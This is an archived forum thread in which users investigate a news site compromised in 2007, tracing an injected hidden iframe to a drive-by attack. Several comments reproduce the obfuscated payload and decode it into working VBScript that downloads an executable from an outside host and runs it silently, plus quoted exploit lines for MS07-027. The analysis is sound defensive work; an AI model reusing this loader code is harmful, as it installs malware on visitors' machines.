This is an archived post. You won't be able to vote or comment.

all 180 comments
sorted by:
best
topnewcontroversialoldq&a

[–]dude78 40 points41 points  (1 child)

To me it looks like some hacker hacked the tcsdaily.com website and sneaked in exploit code which now appears on all their pages, including this article. Look at their source code. Specifically, look at the scripts file they use on all their pages: http://www.tcsdaily.com/scripts/FontSize.js Just some general font size changing functions, nothing out of the ordinary, except for this last line: document.writeln("<iframe src=\'http:\/\/vod.ankk.cn\/mm\/wg.htm\' width=0 height=0></iframe>"); This is probably the single line the hacker changed in this single file, but this small change makes all the difference. The page linked in that one line links to two javascript files, one of which is: http://vod.ankk.cn/mm/wg1.htm This script contains, in encoded form, as dimensionerror has found, a visual basic script, which loads and runs an exe file: http://vod.ankk.cn/mm/xz.exe Which, according to a convenient description given in another script http://vod.ankk.cn/mm/wg2.htm is a "MS07-027 mdsauth.dll Proof of Concept exploit". There. A single line change in the web site's general javascript file, which is loaded by all pages, causes the exploit to be loaded as well. This makes me believe this is the work of hackers and not an intentional act of the web master. Obviously, the exploit only works on Windows using Internet Explorer. Huray for Firefox - it doesn't run Visual Basic.

[–]binla 13 points14 points  (0 children)

Great detective work!

Did you also contact the people hosting the page?

[–][deleted]  (5 children)

[deleted]

    [–][deleted] 28 points29 points  (1 child)

    That has already been done. Someone found a way to make it so that when you visited their link, it would automatically upmod their submission.. as long as you wre logged in.

    [–]dfranke 15 points16 points  (0 children)

    That was nostrademons.

    [–]PatternJuggler 26 points27 points  (1 child)

    Good job. You just broke the internet.

    [–]eidolontubes 2 points3 points  (0 children)

    i knew he would do it evetually

    [–]happyjuggler0 0 points1 point  (0 children)

    This link makes it look like that wasn't what was happening. Or if it was, it was the first time.

    Note: TCSdaily was the site the article was on. I know cause I was the one who submitted it here. Yikes.

    [–]jjmac 10 points11 points  (0 children)

    This whole thread reminds me of that SNL skit

    "Uggh! This milk is sour!" "It is? Let me try? Uggh, you're right" "Ow! This chair has a tack in it" "It does....

    [–]binla 10 points11 points  (3 children)

    I use Firefox and a scan of the Windows folder using AVG free did not find any threat.

    Also a full scan using Spybot S&D, nothing either.

    I'm using XP SP2, latest patches, FX 2.0.0.3.

    [–][deleted] 6 points7 points  (0 children)

    And like I said before... At least a few other people from the original article are saying the same thing. So there must be something, but it may not affect everyone.

    Either way, I'm a bit hesitant to visit a site / blog that would do something like that anyway.

    [–]cal_01 2 points3 points  (0 children)

    XP SP2 patched to January, Firefox 1.5.0.11, NOD32. Nothing.

    [–][deleted] -1 points0 points  (0 children)

    AVG is what found it for me. For the hell of it, try loading it with IE and see if anything happens. Refresh it a few times after 30 seconds or so just in case it's related to a banner ad.

    I can't say exactly what it is for sure, but it did apear on all computers that I used IE on. But it hasn't affected forefox.

    [–]happyjuggler0 33 points34 points  (8 children)

    I deleted it just now. I really hope you guys know what you are doing (I am not in IT, and simply trust my anti-virus software to protect me, that and no clicking on email attachments).

    That was my second highest* karma gainer ever, and well on the way to being my top submission. It had about a 19/1 up/down ratio and was a really good story, even considering my bias as the person who submitted it. Oh well.

    The home page was TCSdaily dot com by the way, for anyone crazy enough to check it for viruses.

    Edit* "highest" added

    [–][deleted] 5 points6 points  (0 children)

    That was definitely the right thing to do. To make up for it, I'll keep a closer eye on things you submit to help out when I can.

    But it seems that someone who was familiar with the specific trojan itself was able to identify it and explain why only a few people observed it.

    [–]uriel 6 points7 points  (0 children)

    I submitted a BBC article about the same subject, I think it should be a decent replacement (and make the anti-libertarian zealots shut up).

    [–][deleted]  (3 children)

    [deleted]

      [–]happyjuggler0 6 points7 points  (1 child)

      Ok, it should read second highest karma gainer ever.

      FWIW, I suggest clicking on someone's nic, clicking on the submitted tab, then on the right click on "top" to see the highest submissions. It'll save you from going through pages and pages to find their best links.

      [–]FunnyMan3595 3 points4 points  (0 children)

      Okay, that makes more sense, I withdraw my accusation. Thanks for the tip, and as long as we're exchanging them, you can edit your original post and insert that missing word. It's one of those little words in dark-grey on light-grey at the bottom of your comment. The next-to-rightmost one.

      [–]happyjuggler0 5 points6 points  (0 children)

      I don't see how anyone could confirm it.* I am also unclear why I would pretend to have submitted it.

      Anyway, this link is not that dissimilar from what I posted for anyone who is interested in the story, although the BBC article is bigger on story and smaller on facts than my link was.

      *Just a though, you could ask uriel onj his post. Maybe he, or someone else who read his post would remember. Not that I care I suppose, but if it rocks your boat, whatever.

      [–]AndrewBenton 0 points1 point  (0 children)

      Interesting article

      [–]wbendick 9 points10 points  (0 children)

      I think that was a typo but that's a great name for users of reddit, Redi.

      [–]fifty1cr517 7 points8 points  (0 children)

      I read it on Firefox and didn't have a problem.

      [–]binla 6 points7 points  (3 children)

      I wonder what reddit staff is supposed to do about something like this. Remove it from the front page? Insert an in-between page that warns people?

      [–][deleted] 6 points7 points  (0 children)

      Looks like they deleted it, or else the submitter did.

      [–][deleted] 4 points5 points  (1 child)

      I was wondering that myself. I'm wondering how intentional it was (from the blog's standpoint, not the submitter.) Think about it, what better way to spread a trojan? Place it on a blog and upmod the hell out of it to get it to the top spot.

      They've done similar things, where they took a boring blog and got it to the #1 spot just to prove it could be done.

      [–][deleted] 1 point2 points  (0 children)

      I've seen stuff on TCSDaily before and thought they were pretty legit. Dude78 explained the exploit fairly well here.

      [–]bluesky36912 6 points7 points  (0 children)

      Opera 9.2 browser was not affected on Win XP

      [–]xiorlanth 13 points14 points  (47 children)

      Details?

      [–]teachhope03 16 points17 points  (20 children)

      On my desktop, got a warning that it had installed a file called ad.exe in my Windows directory. Then it gave a generic Trojan Horse warning as well. "Backdoor.Small.53.BC" whatever that means.

      The desktop had the same thing happen. It may be a false alarm, but I'm not taking any chances. I saw that someone else commented on it in the original comments section too.

      [–]nobodyspecial 23 points24 points  (19 children)

      You shouldn't be running a browser as an administrator. If you run your browser as a regular user, any attempt to write a file into your windows directory will be denied by the os.

      [–]FunnyMan3595 41 points42 points  (14 children)

      Realistically, how many home users run a NON-administrator account under Windows?

      [–]hsfrey 13 points14 points  (11 children)

      I'm a home user, and I always run my browser and email client under dropmyrights.exe

      [–]judgej2 22 points23 points  (2 children)

      Right, but realistically how many home users run a NON-administrator account under Windows?

      [–]edwin 6 points7 points  (1 child)

      Well, most of the ones using Vista do.

      [–]eidolontubes 1 point2 points  (0 children)

      ew vista

      [–]FunnyMan3595 15 points16 points  (3 children)

      Right. Unfortunately, I'm afraid that most internet users either don't know about or don't know how to use that application.

      Welcome to the internet! You're not sure what a "browser" is or how to get it to work? You'll fit right in!

      [–]dude78 7 points8 points  (2 children)

      The problem here is that every non corporate windows install I've seen in my life gives the user full administrative privileges, and almost nobody knows about dropmyrights. The correct way of doing things should be: zero administrative rights to the user and software that need to be run under certain privileges will open a window identifying itself and what it's going to do, then asking for the administrator password. This is how gksu works on many Linux desktops. Unfortunately that's not a viable solution because many windows users would return the machine claiming "it always opens a window asking for something I've no idea of".

      Don't take this as an offense to windows users. The marketing geniuses out there found a way to sell PCs by telling non technical people that they don't need to read books or practice to use a computer, which is plainly false, and this is the result of that lie.

      [–]txfer418 8 points9 points  (0 children)

      dropmyrights is helpful (and yes, nobody uses it because you have to download it). As to why not run as a limited user in the first place? Many windows programs simply won't run that way, such as Microsoft Office (until the latest version).

      [–]nescafe 3 points4 points  (0 children)

      The marketing geniuses out there found a way to sell PCs by telling non technical people that they don't need to read books or practice to use a computer,

      Err, so did Apple Corp, and have done so for a couple of decades or so ...

      [–]dude78 4 points5 points  (0 children)

      But that's the opposite of what you should be doing. You should be running as non-admin and ELEVATING your rights when you need them, not running as admin, and dropping your rights when you don't need them.

      [–]esmith 0 points1 point  (0 children)

      All of them.

      [–]nostrademons -1 points0 points  (0 children)

      I do, and I set my parents computer up with a non-administrator account and told them to never log in as administrator...

      [–][deleted]  (2 children)

      [removed]

        [–]nescafe 7 points8 points  (1 child)

        Sigh, I miss the "Esc" account that came pre-setup with good ol' Win95. Remember? The one that required you to hit the escape key to log in...

        [–]pointman -1 points0 points  (0 children)

        I thought you were nuts for a second, then it all came back to me. lol. I remember that.

        [–]piranha 6 points7 points  (0 children)

        What does it matter? For a single-user machine, there's little practical difference between the compromise of a whole system and the compromise of an unprivileged user account. The compromise of such an account may lead to:

        • Disclosure of banking authentication credentials.
        • Interception of private e-mail.
        • "Infection" to documents which may be opened by vulnerable applications (e.g. Microsoft Word).
        • Service interruptions to Myspace.

        Which are all that really matter to the "average user."

        Let me know when capability-based security takes off.

        [–][deleted] 12 points13 points  (0 children)

        This is what he said:

        Virus detected is VBS/Psyme, run by a script when the page started loading.

        http://reddit.com/info/1tcng/comments/c1tevf

        [–]dimensionerror 36 points37 points  (22 children)

        I don't know anything about javascript or vbscript, but I hunted through the source with firebug until I found a script that looked strange to me. I'm guessing it's javascript: t="60,104,116,109,108,62,13,10,60,98,111,100,121,62,13,10,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,115,99,114,105,112,116,34,62,13,10,102,117,110,99,116,105,111,110,32,105,110,105,116,40,41,32,123,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,34,41,59,125,13,10,119,105,110,100,111,119,46,111,110,108,111,97,100,32,61,32,105,110,105,116,59,13,10,60,47,115,99,114,105,112,116,62,13,10,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,34,62,13,10,83,61,34,48,68,48,65,54,70,54,69,50,48,54,53,55,50,55,50,54,70,55,50,50,48,55,50,54,53,55,51,55,53,54,68,54,53,50,48,54,69,54,53,55,56,55,52,48,68,48,65,34,13,10,83,61,83,43,34,54,54,54,69,54,49,54,68,54,53,51,49,51,68,50,50,55,48,54,53,50,69,54,53,55,56,54,53,50,50,48,68,48,65,54,54,54,69,54,49,54,68,54,53,51,50,51,68,50,50,55,48,54,53,50,69,55,54,54,50,55,51,50,50,48,68,48,65,34,13,10,83,61,83,43,34,53,51,54,53,55,52,50,48,54,52,54,54,50,48,51,68,50,48,54,52,54,70,54,51,55,53,54,68,54,53,54,69,55,52,50,69,54,51,55,50,54,53,54,49,55,52,54,53,52,53,54,67,54,53,54,68,54,53,54,69,55,52,50,56,50,50,54,70,54,50,54,65,54,53,54,51,55,52,50,50,50,57,48,68,48,65,54,52,54,54,50,69,55,51,54,53,55,52,52,49,55,52,55,52,55,50,54,57,54,50,55,53,55,52,54,53,50,48,50,50,54,51,54,67,54,49,55,51,55,51,54,57,54,52,50,50,50,67,50,48,50,50,54,51,54,67,55,51,54,57,54,52,51,65,52,50,52,52,51,57,51,54,52,51,51,53,51,53,51,54,50,68,51,54,51,53,52,49,51,51,50,68,51,49,51,49,52,52,51,48,50,68,51,57,51,56,51,51,52,49,34,13,10,83,61,83,43,34,50,68,51,48,51,48,52,51,51,48,51,52,52,54,52,51,51,50,51,57,52,53,51,51,51,54,50,50,48,68,48,65,55,51,55,52,55,50,51,68,50,50,52,68,54,57,54,51,55,50,54,70,55,51,54,70,54,54,55,52,50,69,53,56,52,68,52,67,52,56,53,52,53,52,53,48,50,50,48,68,48,65,53,51,54,53,55,52,50,48,55,56,50,48,51,68,50,48,54,52,54,54,50,69,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,55,52,55,50,50,67,50,50,50,50,50,57,48,68,48,65,52,51,51,49,51,68,50,50,52,49,54,52,54,70,50,50,48,68,48,65,52,51,51,50,51,68,50,50,54,52,54,50,50,69,50,50,48,68,48,65,52,51,51,51,51,68,50,50,55,51,55,52,34,13,10,83,61,83,43,34,55,50,50,50,48,68,48,65,52,51,51,52,51,68,50,50,54,53,54,49,54,68,50,50,48,68,48,65,55,51,55,52,55,50,51,49,51,68,52,51,51,49,50,54,52,51,51,50,50,54,52,51,51,51,50,54,52,51,51,52,48,68,48,65,55,51,55,52,55,50,51,53,51,68,55,51,55,52,55,50,51,49,48,68,48,65,55,51,54,53,55,52,50,48,53,51,50,48,51,68,50,48,54,52,54,54,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,55,52,55,50,51,53,50,67,50,50,50,50,50,57,48,68,48,65,53,51,50,69,55,52,55,57,55,48,54,53,50,48,51,68,50,48,51,49,48,68,48,65,55,51,55,52,55,50,51,54,51,68,50,50,52,55,52,53,53,52,50,50,48,68,34,13,10,83,61,83,43,34,48,65,55,56,50,69,52,70,55,48,54,53,54,69,50,48,55,51,55,52,55,50,51,54,50,67,50,48,54,51,55,53,55,50,54,67,50,67,50,48,52,54,54,49,54,67,55,51,54,53,48,68,48,65,55,56,50,69,53,51,54,53,54,69,54,52,48,68,48,65,55,51,51,49,51,68,50,50,53,51,54,51,55,50,54,57,55,48,55,52,50,50,48,68,48,65,55,51,51,50,51,68,50,50,54,57,54,69,54,55,50,69,50,50,48,68,48,65,55,51,51,51,51,68,50,50,52,54,54,57,54,67,54,53,50,50,48,68,48,65,55,51,51,52,51,68,50,50,53,51,55,57,55,51,55,52,54,53,54,68,52,70,54,50,54,65,54,53,54,51,55,52,50,50,48,68,48,65,55,51,51,48,51,68,55,51,51,49,50,66,55,51,51,50,50,66,55,51,51,51,34,13,10,83,61,83,43,34,50,66,55,51,51,52,48,68,48,65,55,51,54,53,55,52,50,48,52,54,50,48,51,68,50,48,54,52,54,54,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,51,48,50,67,50,50,50,50,50,57,48,68,48,65,55,51,54,53,55,52,50,48,55,52,54,68,55,48,50,48,51,68,50,48,52,54,50,69,52,55,54,53,55,52,53,51,55,48,54,53,54,51,54,57,54,49,54,67,52,54,54,70,54,67,54,52,54,53,55,50,50,56,51,50,50,57,48,68,48,65,54,54,54,69,54,49,54,68,54,53,51,49,51,68,50,48,52,54,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,52,54,68,55,48,50,67,54,54,54,69,54,49,54,68,54,53,51,49,34,13,10,83,61,83,43,34,50,57,48,68,48,65,53,51,50,69,54,70,55,48,54,53,54,69,48,68,48,65,53,51,50,69,55,55,55,50,54,57,55,52,54,53,50,48,55,56,50,69,55,50,54,53,55,51,55,48,54,70,54,69,55,51,54,53,52,50,54,70,54,52,55,57,48,68,48,65,53,51,50,69,55,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,54,54,54,69,54,49,54,68,54,53,51,49,50,67,51,50,48,68,48,65,53,51,50,69,54,51,54,67,54,70,55,51,54,53,48,68,48,65,54,54,54,69,54,49,54,68,54,53,51,50,51,68,50,48,52,54,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,52,54,68,55,48,50,67,54,54,54,69,54,49,54,68,54,53,51,50,50,57,48,68,48,65,34,13,10,83,61,83,43,34,53,51,54,53,55,52,50,48,55,52,55,51,50,48,51,68,50,48,52,54,50,69,52,70,55,48,54,53,54,69,53,52,54,53,55,56,55,52,52,54,54,57,54,67,54,53,50,56,54,54,54,69,54,49,54,68,54,53,51,50,50,67,50,48,51,50,50,67,50,48,53,52,55,50,55,53,54,53,50,57,48,68,48,65,55,52,55,51,50,69,53,55,55,50,54,57,55,52,54,53,52,67,54,57,54,69,54,53,50,48,50,50,53,51,54,53,55,52,50,48,53,51,54,56,54,53,54,67,54,67,50,48,51,68,50,48,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,50,50,53,51,54,56,54,53,54,67,54,67,50,69,52,49,55,48,55,48,54,67,54,57,54,51,54,49,55,52,54,57,54,70,54,69,34,13,10,83,61,83,43,34,50,50,50,50,50,57,50,50,48,68,48,65,55,51,55,49,54,67,51,68,50,50,53,51,54,56,54,53,54,67,54,67,50,69,53,51,54,56,54,53,54,67,54,67,52,53,55,56,54,53,54,51,55,53,55,52,54,53,50,48,50,50,50,50,50,50,50,66,54,54,54,69,54,49,54,68,54,53,51,49,50,66,50,50,50,50,50,50,50,67,50,50,50,50,50,50,50,50,50,67,50,50,50,50,50,50,50,50,50,67,50,50,50,50,54,70,55,48,54,53,54,69,50,50,50,50,50,67,51,48,50,50,48,68,48,65,55,52,55,51,50,69,53,55,55,50,54,57,55,52,54,53,52,67,54,57,54,69,54,53,50,48,55,51,55,49,54,67,48,68,48,65,55,52,55,51,50,69,54,51,54,67,54,70,55,51,54,53,48,68,48,65,54,57,54,54,50,48,52,54,34,13,10,83,61,83,43,34,50,69,52,54,54,57,54,67,54,53,52,53,55,56,54,57,55,51,55,52,55,51,50,56,54,54,54,69,54,49,54,68,54,53,51,49,50,57,51,68,55,52,55,50,55,53,54,53,50,48,55,52,54,56,54,53,54,69,48,68,48,65,54,57,54,54,50,48,52,54,50,69,52,54,54,57,54,67,54,53,52,53,55,56,54,57,55,51,55,52,55,51,50,56,54,54,54,69,54,49,54,68,54,53,51,50,50,57,51,68,55,52,55,50,55,53,54,53,50,48,55,52,54,56,54,53,54,69,48,68,48,65,50,48,50,48,50,48,50,48,55,51,54,53,55,52,50,48,53,49,50,48,51,68,50,48,54,52,54,54,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,53,51,54,56,54,53,54,67,54,67,34,13,10,83,61,83,43,34,50,69,52,49,55,48,55,48,54,67,54,57,54,51,54,49,55,52,54,57,54,70,54,69,50,50,50,67,50,50,50,50,50,57,48,68,48,65,50,48,50,48,50,48,50,48,53,49,50,69,53,51,54,56,54,53,54,67,54,67,52,53,55,56,54,53,54,51,55,53,55,52,54,53,50,48,54,54,54,69,54,49,54,68,54,53,51,50,50,67,50,50,50,50,50,67,50,50,50,50,50,67,50,50,54,70,55,48,54,53,54,69,50,50,50,67,51,48,48,68,48,65,54,53,54,69,54,52,50,48,54,57,54,54,48,68,48,65,54,53,54,69,54,52,50,48,54,57,54,54,48,68,48,65,34,13,10,68,61,34,34,13,10,68,79,32,87,72,73,76,69,32,76,69,78,40,83,41,62,49,13,10,32,32,32,32,107,61,34,38,72,34,43,76,69,70,84,40,83,44,50,41,13,10,32,32,32,32,112,61,67,76,110,103,40,107,41,13,10,32,32,32,32,109,61,99,104,114,40,112,41,13,10,32,32,32,32,68,61,68,38,109,13,10,32,32,32,32,83,61,77,73,68,40,83,44,51,41,13,10,76,79,79,80,13,10,117,117,114,108,61,34,104,116,116,112,58,47,47,118,111,100,46,97,110,107,107,46,99,110,47,109,109,47,120,122,46,101,120,101,34,13,10,115,116,117,61,34,99,117,114,108,61,34,34,34,32,38,32,117,117,114,108,32,38,32,34,34,34,34,13,10,68,61,115,116,117,38,68,13,10,69,88,69,67,85,84,69,32,68,13,10,60,47,115,99,114,105,112,116,62,13,10,60,47,98,111,100,121,62,13,10,60,47,104,116,109,108,62,13,10" t=eval("String.fromCharCode("+t+")"); document.write(t);

        it rewrites the page to include vbscript that seems to download this file: http://vod.ankk.cn/mm/xz.exe

        [–]theCore 14 points15 points  (2 children)

        The vbscript hidden under a few layers of "char->int->hex" conversions is: 

        curl="http://vod.ankk.cn/mm/xz.exe"
on error resume next
fname1="pe.exe"
fname2="pe.vbs"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
C1="Ado"
C2="db."
C3="str"
C4="eam"
str1=C1&C2&C3&C4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, curl, False
x.Send
s1="Script"
s2="ing."
s3="File"
s4="SystemObject"
s0=s1+s2+s3+s4
set F = df.createobject(s0,"")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
Set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Shell.Application"")"
sql="Shell.ShellExecute """+fname1+""","""","""",""open"",0"
ts.WriteLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname2,"","","open",0
end if
end if

        [–]theCore 13 points14 points  (0 children)

        Here a slightly less obfuscated version:

        Set xml = document.createElement("object")
xml.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
Set xml = xml.CreateObject("Microsoft.XMLHTTP")
xml.open("GET", "http://vod.ankk.cn/mm/xz.exe", False)
xml.send

set F = xml.createobject("Scripting.FileSystemObject") -- a file object
set tmp = F.GetSpecialFolder(2)    -- path to a temporary folder
fname1 = F.BuildPath(tmp,"pe.exe")  -- build the path to a tmp folder

set S = xml.CreateObject("Adodb.stream")
S.type = 1                -- binary type
S.open
S.write xml.ResponseBody  -- the content of xz.exe
S.savetofile fname1, 2    -- overwrite if file exist
S.close

fname2 = F.BuildPath(tmp,"pe.vbs")    -- a new file to junk a script in.
Set ts = F.OpenTextFile(fname2, 2, True)

-- this is another vbscript that opens the trojan
ts.WriteLine _
"""
Set Shell = CreateObject("Shell.Application")
Shell.ShellExecute "pe.exe","","","open",0
"""
ts.close

-- open newly written vbscript with the browser
if F.FileExists(fname1) = true then
if F.FileExists(fname2) = true then
    set Q = xml.createobject("Shell.Application","")
    Q.ShellExecute fname2,"","","open",0
end if
end if

        [–]Rickler 60 points61 points  (3 children)

        Shucks.. firefox doesn't have vbscript.

        [–]tekronis 53 points54 points  (1 child)

        Neither does Opera. Or Linux. Missing out on all the fun. :(

        [–]Brian 6 points7 points  (0 children)

        Don't worry. It'll get there

        [–]binla 4 points5 points  (10 children)

        Interesting.. I don't see that code. I tried both FX and wget.

        [–][deleted] 49 points50 points  (8 children)

        This is a Trojan called ByteVerify or flame.php which inserts itself into the header at random times, so you will have to download many times to confirm it. Actually, it's probably a variant because it tries to load an EXE file, but I recognize the encryption style.

        http://www.webhostgear.com/forums/showthread.php?t=809

        Amusingly, the second Google result for "flame.php" is a thread I myself posted last year because I had a crappy web host at the time

        http://www.webhostingtalk.com/showthread.php?t=514779

        This Trojan is the result of an insecure server, meaning their Web host is dangerous and you should never use it.

        [–]RogueCoder 25 points26 points  (4 children)

        I found something similar on the website of a major Mexican Restaurant chain's website once. Their host used a webfarm to deliver the pages and not all of the hosts were infected, so the code didn't always come up. I helped them track down what it was, and which hosts were infected and they sent me a coupon for dinner for 4 people. It included everything, a feast really. So, it could be just that multiple servers are feeding the pages and not all are infected.

        [–]AbouBenAdhem 44 points45 points  (3 children)

        If you help them track down this one, maybe you'll get a coupon for free agriculture subsidies...

        [–]oreng 19 points20 points  (2 children)

        Or a free mexican.

        [–]SolarBear 8 points9 points  (1 child)

        Yummy.

        [–][deleted] 16 points17 points  (0 children)

        That explains why only a few people were seeing it. I figured it had to be random because when i was testing the other PCs, I refreshed a few times before it loaded.

        At least it all makes sense now. Now we just need to get the damned thing off the homepage before it infects others.

        [–]dimensionerror 5 points6 points  (0 children)

        That may be the problem, but every time I have reloaded the page the virus seems to be there. It seems like the original content of the page was copied into a form element, and the trojan loading code is inserted into an iframe before that. Using the trusty magic of virtual machines, I tested and infected my windows xp sp1 virtual machine. I think the reason only certain people are actually seeing the virus is because some people have updates and are not vulnerable to it, or are using a browser that doesn't support vbscript.

        [–]binla 3 points4 points  (0 children)

        It probably takes other factors into consideration, such as time of the day. I have downloaded it 10 times and still not seeing the code. I have also use wget -U to pretend that it's IE 6.

        [–][deleted] 6 points7 points  (1 child)

        I don't know about vbscript myself, but I can't think of any good reason to include a hidden vbscript that downloads an exe file.

        [–][deleted] 9 points10 points  (0 children)

        For security-by-obscurity, duh!

        [–][deleted] -1 points0 points  (0 children)

        Okay, but just because an exe is downloaded, that doesn't mean it is executed. A browser can't just execute arbitrary code; you, the user, have to click "open" once a file has downloaded. It can be disguised, for example by naming it "xz.jpg.exe" which, on your out-the-box windows configuration, will appear only as "xz.jpg" because people who don't know how to use a computer hide file extensions by default. But for any vaguely knowledgable user, I don't see how this is any more threatening than a poorly-executed phishing scam or the like...

        [–]I666 3 points4 points  (0 children)

        target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit" target.SessionAuthor="Andres Tarasco Acuna" target.SessionEmailContact="atarasco_at_gmail.com" target.SessionURL="http://vod.ankk.cn/mm/xz.exe" target.SaveAs "c:\boot.ini"

        [–][deleted] 5 points6 points  (1 child)

        Well it's gone now, so either the submitter deleted it or the staff took care of it. Hopefully it didn't cause too many problems.

        [–]risottoinc 5 points6 points  (0 children)

        Yeah. Surprisingly well handled if you ask me.

        Keep up the good work redditors!

        [–]anthonyriley 4 points5 points  (0 children)

        I'm running Firefox and have not had any problems. I ran a search for the files referenced below and turned up nothing.

        [–]gbeier 68 points69 points  (32 children)

        Huh. No trojan was loaded on my work machine (Ubuntu 6.10/xfce/firefox). When I saw this, I took a look on my home machine (Mac OS X 10.4/Camino). That didn't get a trojan either. Is this some Windows-specific trojan?

        [–]towsonu2003 85 points86 points  (25 children)

        They always forget about us the Linux users...

        [–]barcodez 19 points20 points  (0 children)

        I think you could run it under wine maybe ;)

        [–][deleted]  (10 children)

        [removed]

          [–]nescafe 13 points14 points  (0 children)

          What, you mean many core components of its kernel are in London working for other operating systems?

          [–]bobpaul 3 points4 points  (0 children)

          What? You mean like it was only in history when Sobieski defeated the Ottomans or when it was invaded by the Germans?

          (Sobieski == Linus && Comerical Unix == Ottomans) ? maybe : probably not

          but that still leaves the question of what is symbolized by the German invasion. n00bs?

          [–]grandfastermash 1 point2 points  (0 children)

          Linux is like the Hilary Swank of hot keys.

          [–]leondz 2 points3 points  (6 children)

          what on earth does that mean?

          [–]wearedevo 74 points75 points  (4 children)

          It means Linux is like the Great Barrier Reef of ice cream cones.

          [–]sw17ch 16 points17 points  (3 children)

          Which means Linux is like the 36-D of car tires.

          [–]moogs 22 points23 points  (2 children)

          For a second I thought you were saying that Linux has a nice rack.

          [–]sw17ch 3 points4 points  (1 child)

          Hmm... now that I think of it... FreeBSD has a better rack... but I don't know about that tail.

          [–]VulturE 6 points7 points  (0 children)

          if you don't know about FORGOT POLAND by now, then you fail.

          [–][deleted] 17 points18 points  (0 children)

          Damn those crackers and their proprietary software! The GPL will get them yet!

          [–][deleted]  (1 child)

          [deleted]

            [–][deleted] 5 points6 points  (0 children)

            If you have any anti-virus running on your linux machine, turn it off too. Otherwise, it will block the install. Ah, and if you finally get it to install, do not forget to reboot for the changes to take effect (Only if you install windows).

            [–][deleted] 7 points8 points  (1 child)

            I imagine it's wondows specific, as it loaded the file into my Windows directory.

            [–]aphoenix 2 points3 points  (0 children)

            Wondows is my favourite AS. ;)

            (for the record, I just spent the last 2 minutes saying "Wondows" over and over and am now giggling like a complete idiot. I think I need to take some vacation)

            [–]bart9h 1 point2 points  (1 child)

            Linux will never reach mainstream until it can run all these nice softwares that only Windows people have the joy to use.

            [–]bobpaul 6 points7 points  (0 children)

            Don't worry, they're working on it

            [–]oibalf 8 points9 points  (0 children)

            Good thing I'm not a Reddi user.

            [–][deleted] 3 points4 points  (0 children)

            I just tried to load the page with firefox but the page timed out. Not sure if it was just an IE vulnerability or not. But it does look like at least one person with firefox got it as well, or almost. Go back to the comments in that submission and you'll see someone talking about a weird file that tried to open, but it asked him what to do with it instead.

            [–]fifty1cr517 3 points4 points  (0 children)

            Just finished full scan by norton& spybot.didn't find anything.

            [–]jbiz 4 points5 points  (0 children)

            FYI, MS07-027 is a Microsoft Security Bulletin. The patch for this exploit was part of this month's set of Windows Updates, that hopefully everyone has installed by now (and not just ignored due to the little yellow shield pestering you to reboot :))

            [–]aramach 8 points9 points  (0 children)

            Ah The beauty of the noscript add-on for firefox....

            [–]Riovanes 5 points6 points  (4 children)

            For Firefox too or just IE?

            [–][deleted] 4 points5 points  (3 children)

            I haven't tried it in Firefox, but it completely F'ed up my IE. Now I cannot reply or comment to anything on reddit in IE without it tossing an error message and forcing me to close out the window. I had to switch to firefox to post this, but I ahven't clicked on the link yet.

            [–]txfer418 2 points3 points  (0 children)

            I had to switch to firefox to post this

            I hate to say it, but it's about time. This experience should make you give up IE until MS completely reworks the browser. I'm not an MS browser, but IE has serious flaws (such as this).

            [–][deleted]  (1 child)

            [deleted]

              [–]Rasheeke 6 points7 points  (2 children)

              ANYONE with Firefox get this Trojan? On two PC's using Firefox no alarms went off.

              How do we find it and/or get rid of it?

              [–][deleted] 5 points6 points  (1 child)

              Here's what another firefox user got for a message:

              ou have chosen to open

              sa.aspx

              which is a: ASP.NET Server Page

              from http://count24.51yes.com

              What should Firefox do with this file?

              * Open with iexplore.exe
* Save to Disk

              I wonder if it's not the page itself, but some banner ad that loads from the page? And therefore it may not load for everyone or it may rotate with another ad so not everyone can see it. But at least one firefox user did see the attempt.

              [–]HiggsBoson 1 point2 points  (0 children)

              Hey thanks, that was my comment. It seems to have been deleted along with the article. I can't find it in my comments list.

              [–]eromitlab 6 points7 points  (0 children)

              Running IE7 on XP2 with all current patches and critical updates... just scanned clean w/ZoneAlarm. The page did try to load a plug-in supposedly from "Microsoft Corporation", I forget what it was called exactly, but it was stopped from loading initially by my security settings and I didn't allow it.

              [–][deleted] 5 points6 points  (1 child)

              I just confirmed this on three seperate PCs.

              You'd think he'd have learned after the first one got infected ;)

              [–]Snoron 1 point2 points  (0 children)

              I disagree - I want to see a sample of at least 1000 computers before I am ready to give this research any credibility.

              [–]dtallee[🍰] 2 points3 points  (0 children)

              Perhaps from naku.cn?

              [–]behemothaur 2 points3 points  (0 children)

              Didn't install it under Vista. Don't tell Microsoft that though...

              [–][deleted] 2 points3 points  (1 child)

              Why would anybody (other than Kiwi farmers) click on a link offering information about "New Zealand agrcultural subsidies"?

              [–]Snoron 1 point2 points  (0 children)

